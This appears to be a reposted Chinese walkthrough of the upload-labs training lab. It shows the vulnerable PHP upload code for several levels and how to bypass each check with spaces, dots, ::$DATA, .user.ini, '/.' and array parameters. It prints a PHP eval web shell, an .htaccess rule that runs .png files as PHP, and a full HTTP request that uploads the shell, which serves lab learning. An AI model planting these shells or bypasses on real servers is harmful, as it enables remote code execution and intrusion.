upload-labs通关攻略

admin
admin
admin
0
文章
0
评论
2026-03-13 01:45:55 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文档为upload-labs靶场通关攻略,详细介绍了针对不同文件上传验证机制的绕过方法,包括前端JS验证绕过、MIME类型修改、黑名单过滤不完整利用(如.phtml、.htaccess、.user.ini)、大小写绕过、空格绕过、点号绕过等关键技术。文档通过源码分析与payload演示,系统阐述了文件上传漏洞的利用原理与实战技巧,为Web安全测试提供了具体的可操作方案。 综合评分: 85 文章分类: 渗透测试,WEB安全,漏洞分析,安全建设,实战经验

payload

1

2

3

<?php
@eval($_POST['a']);
?>

在F12的设置中禁用javascript

先上传.htaccess文件,临时修改配置(注意:文件名就是.htaccess不是后缀)

1

AddType application/x-httpd-php &nbsp;.png

Pass-06%20【缺少trim()】%20空格绕过

源码

点击展开/收起

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

$is_upload&nbsp;=&nbsp;false;
$msg&nbsp;=&nbsp;null;
if&nbsp;(isset($_POST['submit']))%20{
&nbsp;%20&nbsp;%20if&nbsp;(file_exists(UPLOAD_PATH))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$deny_ext&nbsp;=&nbsp;array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;$_FILES['upload_file']['name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;deldot($file_name);//删除文件名末尾的点
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strrchr($file_name,&nbsp;'.');
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strtolower($file_ext);&nbsp;//转换为小写
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;str_ireplace('::$DATA',&nbsp;'',&nbsp;$file_ext);//去除字符串::$DATA

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(!in_array($file_ext,&nbsp;$deny_ext))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$temp_file&nbsp;=&nbsp;$_FILES['upload_file']['tmp_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$img_path&nbsp;=%20UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(move_uploaded_file($temp_file,$img_path))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$is_upload&nbsp;=&nbsp;true;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'上传出错!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'此文件不允许上传';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=%20UPLOAD_PATH%20.&nbsp;'文件夹不存在,请手工创建!';
&nbsp;%20&nbsp;%20}
}

少了trim()函数,该函数用来除去首尾的空格

抓包修改一下将后缀名改为.php(最后面有一个空格)

空格绕过

Pass-07%20【缺少deldot()】点绕过

源码

点击展开/收起

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

$is_upload&nbsp;=&nbsp;false;
$msg&nbsp;=&nbsp;null;
if&nbsp;(isset($_POST['submit']))%20{
&nbsp;%20&nbsp;%20if&nbsp;(file_exists(UPLOAD_PATH))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$deny_ext&nbsp;=&nbsp;array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;trim($_FILES['upload_file']['name']);
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strrchr($file_name,&nbsp;'.');
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strtolower($file_ext);&nbsp;//转换为小写
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;str_ireplace('::$DATA',&nbsp;'',&nbsp;$file_ext);//去除字符串::$DATA
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;trim($file_ext);&nbsp;//首尾去空

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(!in_array($file_ext,&nbsp;$deny_ext))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$temp_file&nbsp;=&nbsp;$_FILES['upload_file']['tmp_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$img_path&nbsp;=%20UPLOAD_PATH.'/'.$file_name;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(move_uploaded_file($temp_file,&nbsp;$img_path))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$is_upload&nbsp;=&nbsp;true;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'上传出错!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'此文件类型不允许上传!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=%20UPLOAD_PATH%20.&nbsp;'文件夹不存在,请手工创建!';
&nbsp;%20&nbsp;%20}
}

deldot()函数没了,该函数用于删除文件名末尾的点

点绕过

抓包修改后缀名为.php.

Pass-08%20【缺少去除字符串::$DATAWindows环境】%20::$DATA绕过

源码

点击展开/收起

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

$is_upload&nbsp;=&nbsp;false;
$msg&nbsp;=&nbsp;null;
if&nbsp;(isset($_POST['submit']))%20{
&nbsp;%20&nbsp;%20if&nbsp;(file_exists(UPLOAD_PATH))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$deny_ext&nbsp;=&nbsp;array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;trim($_FILES['upload_file']['name']);
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;deldot($file_name);//删除文件名末尾的点
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strrchr($file_name,&nbsp;'.');
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strtolower($file_ext);&nbsp;//转换为小写
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;trim($file_ext);&nbsp;//首尾去空

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(!in_array($file_ext,&nbsp;$deny_ext))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$temp_file&nbsp;=&nbsp;$_FILES['upload_file']['tmp_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$img_path&nbsp;=%20UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(move_uploaded_file($temp_file,&nbsp;$img_path))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$is_upload&nbsp;=&nbsp;true;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'上传出错!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'此文件类型不允许上传!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=%20UPLOAD_PATH%20.&nbsp;'文件夹不存在,请手工创建!';
&nbsp;%20&nbsp;%20}
}

缺少了

1

$file_ext&nbsp;=&nbsp;str_ireplace('::$DATA',&nbsp;'',&nbsp;$file_ext);//去除字符串::$DATA

当你上传一个文件名为 shell.php::$DATA 的文件时:

  1. 1. 后端代码(验证层):它看到后缀是 ::$DATA。它去对比黑名单(.php.asp.jsp),发现 ::$DATA 不在名单里。允许上传!
  2. 2. Windows%20保存(存储层):Windows%20准备存这个文件时,发现后缀是 ::$DATA。它会自动把这个后缀剥离掉,只保留前面的 shell.php 作为文件名存入硬盘。

结果:你骗过了检查员,但在硬盘里留下了一个完整的、可执行的 .php 文件。

抓包修改后缀名改为.php::$DATA

访问随即修改后的文件名即可不带上::$DATA

Pass-09%20【缺少随机命名】重新user.ini绑定%20+ .%20.点空格点绕过

源码

点击展开/收起

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

$is_upload&nbsp;=&nbsp;false;
$msg&nbsp;=&nbsp;null;
if&nbsp;(isset($_POST['submit']))%20{
&nbsp;%20&nbsp;%20if&nbsp;(file_exists(UPLOAD_PATH))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$deny_ext&nbsp;=&nbsp;array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;trim($_FILES['upload_file']['name']);
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;deldot($file_name);//删除文件名末尾的点
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strrchr($file_name,&nbsp;'.');
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;strtolower($file_ext);&nbsp;//转换为小写
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;str_ireplace('::$DATA',&nbsp;'',&nbsp;$file_ext);//去除字符串::$DATA
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;trim($file_ext);&nbsp;//首尾去空

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(!in_array($file_ext,&nbsp;$deny_ext))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$temp_file&nbsp;=&nbsp;$_FILES['upload_file']['tmp_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$img_path&nbsp;=%20UPLOAD_PATH.'/'.$file_name;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(move_uploaded_file($temp_file,&nbsp;$img_path))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$is_upload&nbsp;=&nbsp;true;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'上传出错!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'此文件类型不允许上传!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=%20UPLOAD_PATH%20.&nbsp;'文件夹不存在,请手工创建!';
&nbsp;%20&nbsp;%20}
}

缺少了随机命名

1

$img_path&nbsp;=%20UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;

这题目是

1

$img_path&nbsp;=%20UPLOAD_PATH.'/'.$file_name;

那么就可以用之前没用到的.user.ini

先上传.user.ini来修改配置

1

auto_prepend_file=9.png

折腾半天发现是自己环境没配好

这题是白名单,只允许jpg,png,gif文件后缀

提示是上传路径可控

抓个包看看(其实是看wp了)

抓包看

在上传的过程中发现缺少了\

Pass-19【move_uploaded_file()】php加/.绕过

源码

点击展开/收起

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

$is_upload&nbsp;=&nbsp;false;
$msg&nbsp;=&nbsp;null;
if&nbsp;(isset($_POST['submit']))%20{
&nbsp;%20&nbsp;%20if&nbsp;(file_exists(UPLOAD_PATH))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$deny_ext&nbsp;=&nbsp;array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;$_POST['save_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_ext&nbsp;=&nbsp;pathinfo($file_name,PATHINFO_EXTENSION);

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if(!in_array($file_ext,$deny_ext))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$temp_file&nbsp;=&nbsp;$_FILES['upload_file']['tmp_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$img_path&nbsp;=%20UPLOAD_PATH%20.&nbsp;'/'&nbsp;.$file_name;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(move_uploaded_file($temp_file,&nbsp;$img_path))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$is_upload&nbsp;=&nbsp;true;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}else{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'上传出错!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}else{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;'禁止保存为该类型文件!';
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}

&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=%20UPLOAD_PATH%20.&nbsp;'文件夹不存在,请手工创建!';
&nbsp;%20&nbsp;%20}
}


1

if%20(move_uploaded_file($temp_file,%20$img_path))%20{

move_uploaded_file()有这么一个特性,会忽略掉文件末尾的%20/.

上传

将filename后缀改为png

save_name改为19.php/.

Pass-20【$ext%20=%20end($file)】%20数组绕过

源码

点击展开/收起

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

$is_upload&nbsp;=&nbsp;false;
$msg&nbsp;=&nbsp;null;
if(!empty($_FILES['upload_file'])){
&nbsp;%20&nbsp;%20//检查MIME
&nbsp;%20&nbsp;%20$allow_type&nbsp;=&nbsp;array('image/jpeg','image/png','image/gif');
&nbsp;%20&nbsp;%20if(!in_array($_FILES['upload_file']['type'],$allow_type)){
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;"禁止上传该类型文件!";
&nbsp;%20&nbsp;%20}else{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20//检查文件名
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file&nbsp;=&nbsp;empty($_POST['save_name'])%20?&nbsp;$_FILES['upload_file']['name']%20:&nbsp;$_POST['save_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(!is_array($file))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file&nbsp;=&nbsp;explode('.',&nbsp;strtolower($file));
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$ext&nbsp;=&nbsp;end($file);
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$allow_suffix&nbsp;=&nbsp;array('jpg','png','gif');
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(!in_array($ext,&nbsp;$allow_suffix))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;"禁止上传该后缀文件!";
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}else{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file_name&nbsp;=&nbsp;reset($file)%20.&nbsp;'.'&nbsp;.&nbsp;$file[count($file)%20-&nbsp;1];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$temp_file&nbsp;=&nbsp;$_FILES['upload_file']['tmp_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$img_path&nbsp;=%20UPLOAD_PATH%20.&nbsp;'/'&nbsp;.$file_name;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(move_uploaded_file($temp_file,&nbsp;$img_path))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;"文件上传成功!";
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$is_upload&nbsp;=&nbsp;true;
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}&nbsp;else&nbsp;{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;"文件上传失败!";
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}
&nbsp;%20&nbsp;%20}
}else{
&nbsp;%20&nbsp;%20$msg&nbsp;=&nbsp;"请选择要上传的文件!";
}


1

$allow_type&nbsp;=&nbsp;array('image/jpeg','image/png','image/gif');

检测mime修改为Content-Type:%20image/jpeg即可

1

2

3

4

5

6

$file&nbsp;=&nbsp;empty($_POST['save_name'])%20?&nbsp;$_FILES['upload_file']['name']%20:&nbsp;$_POST['save_name'];
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20if&nbsp;(!is_array($file))%20{
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$file&nbsp;=&nbsp;explode('.',&nbsp;strtolower($file));
&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20}

&nbsp;%20&nbsp;%20&nbsp;%20&nbsp;%20$ext&nbsp;=&nbsp;end($file);

可以将save_name视作数组,检测的ext后缀名是看这个数组最后一个

利用数组绕过验证

请求包如下

点击展开/收起

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

POST%20/Pass-20/index.php%20HTTP/1.1
Host:%20localhost
Content-Length:%20522
Cache-Control:%20max-age=0
sec-ch-ua:%20"Chromium";v="143",%20"Not%20A(Brand";v="24"
sec-ch-ua-mobile:%20?0
sec-ch-ua-platform:%20"Windows"
Accept-Language:%20zh-CN,zh;q=0.9
Origin:%20http://localhost
Content-Type:%20multipart/form-data;%20boundary=----WebKitFormBoundarydlBqvSPRkgc1WXqh
Upgrade-Insecure-Requests:%201
User-Agent:%20Mozilla/5.0%20(Windows%20NT%2010.0;%20Win64;%20x64)%20AppleWebKit/537.36%20(KHTML,%20like%20Gecko)%20Chrome/143.0.0.0%20Safari/537.36
Accept:%20text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site:%20same-origin
Sec-Fetch-Mode:%20navigate
Sec-Fetch-User:%20?1
Sec-Fetch-Dest:%20document
Referer:%20http://localhost/Pass-20/index.php
Accept-Encoding:%20gzip,%20deflate,%20br
Connection:%20keep-alive

------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition:%20form-data;%20name="upload_file";%20filename="20.jpg"
Content-Type: image/jpeg

<?php @eval($_POST["a"]); ?>
------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition: form-data; name="save_name[0]"

20.php/
------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition: form-data; name="save_name[2]"

jpg
------WebKitFormBoundarydlBqvSPRkgc1WXqh
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundarydlBqvSPRkgc1WXqh--

引用链接

[1] upload-labs通关攻略(全) – 清茶先生 – 博客园: https://www.cnblogs.com/chu-jian/p/15515770.html [2] huntergregal/PNG-IDAT-Payload-Generator: Generate a PNG with a payload embedded in the IDAT chunk (Based off of previous concepts and code — credit in README): https://github.com/huntergregal/PNG-IDAT-Payload-Generator

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:取证额头 渗透额头 渗透额头《upload-labs通关攻略》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
upload-labs通关攻略 网络安全文章

upload-labs通关攻略

文章总结: 本文档为upload-labs靶场通关攻略,详细介绍了针对不同文件上传验证机制的绕过方法,包括前端JS验证绕过、MIME类型修改、黑名单过滤不完整利
03-130 评论
SRC挖掘还得练 网络安全文章

SRC挖掘还得练

文章总结: 该文档标题为SRC挖掘还得练,发布于2026年3月,作者为安全艺术。文档正文实质性内容缺失,仅包含一张图片占位符及相关描述。文章核心主旨似乎强调通过
03-130 评论
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0